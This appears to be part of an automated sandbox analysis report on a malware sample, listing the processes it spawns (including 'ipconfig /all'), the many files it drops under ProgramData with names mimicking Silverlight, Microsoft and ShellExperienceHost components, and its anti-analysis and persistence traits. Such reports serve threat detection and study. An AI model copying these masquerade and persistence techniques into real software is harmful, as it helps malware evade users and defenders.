Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: 36_2_00CD2EEF push FFFFFFCAh; ret	36_2_00CD2EF1
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: 36_2_00CD2E6D push ebp; retf	36_2_00CD2E50
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: 36_2_00CD2E03 push esi; ret	36_2_00CD2E11
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: 36_2_00CD2E12 push ebp; retf	36_2_00CD2E50

Persistence and Installation Behavior:

Uses ipconfig to lookup or modify the Windows network settings

Show sources

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all

Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\libcrypto-1_1-x64.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\cli.exe	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\_psutil_windows.cp37-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	File created: C:\ProgramData\lua\luac.exe	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axcontrol\axcontrol.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	File created: C:\ProgramData\lua\mime\core.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe	File created: C:\Users\user\AppData\Local\Temp\DefaultPack.EXE	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\authorization\authorization.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\isapi\PyISAPI_loader.dll	Jump to dropped file
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	File created: C:\ProgramData\lua\effil.dll	Jump to dropped file
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	File created: C:\ProgramData\lua\lua51.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\gui.exe	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	File created: C:\Users\user\AppData\Roaming\Silverlight.exe	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\gui-32.exe	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\bindings\_openssl.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Silverlight.exe	File created: C:\5a70dbc53fcf0baade86ff\install.res.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\cli-64.exe	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	File created: C:\ProgramData\lua\alien\core.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\adsi\adsi.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Silverlight.exe	File created: C:\5a70dbc53fcf0baade86ff\install.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Silverlight.exe	File created: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\lua\ScheduleTask.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\pywin32_system32\pywintypes37.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\API-MS-Win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\gui-64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	File created: C:\ProgramData\lua\zip.dll	Jump to dropped file
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	File created: C:\ProgramData\lua\socket\core.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\libssl-1_1-x64.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\DefaultPack[1].EXE	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	File created: C:\ProgramData\lua\lua5.1.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	File created: C:\ProgramData\lua\lua.exe	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\pywin32_system32\pythoncom37.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\cli-32.exe	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axscript\axscript.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\bindings\_padding.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axdebug\axdebug.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_des.pyd	Jump to dropped file

Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\libcrypto-1_1-x64.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\cli.exe	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\_psutil_windows.cp37-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	File created: C:\ProgramData\lua\luac.exe	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axcontrol\axcontrol.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	File created: C:\ProgramData\lua\mime\core.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\authorization\authorization.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\isapi\PyISAPI_loader.dll	Jump to dropped file
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	File created: C:\ProgramData\lua\effil.dll	Jump to dropped file
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	File created: C:\ProgramData\lua\lua51.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\gui.exe	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\gui-32.exe	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\bindings\_openssl.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\cli-64.exe	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	File created: C:\ProgramData\lua\alien\core.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\adsi\adsi.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\lua\ScheduleTask.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\pywin32_system32\pywintypes37.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\API-MS-Win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\gui-64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	File created: C:\ProgramData\lua\zip.dll	Jump to dropped file
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	File created: C:\ProgramData\lua\socket\core.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\libssl-1_1-x64.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	File created: C:\ProgramData\lua\lua5.1.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	File created: C:\ProgramData\lua\lua.exe	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\pywin32_system32\pythoncom37.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\cli-32.exe	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axscript\axscript.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\bindings\_padding.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axdebug\axdebug.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_des.pyd	Jump to dropped file

Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\adodbapi\license.txt
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\adodbapi\readme.txt
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\isapi\README.txt
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\isapi\samples\README.txt
Source: C:\ProgramData\lua\lua.exe	File created: C:\ProgramData\ShellExperienceHost\Lib\site-packages\isapi\test\README.txt

Hooking and other Techniques for Hiding and Protection:

Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe

Code function: 19_2_00225BF2 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

19_2_00225BF2

Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\ProgramData\lua\luac.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
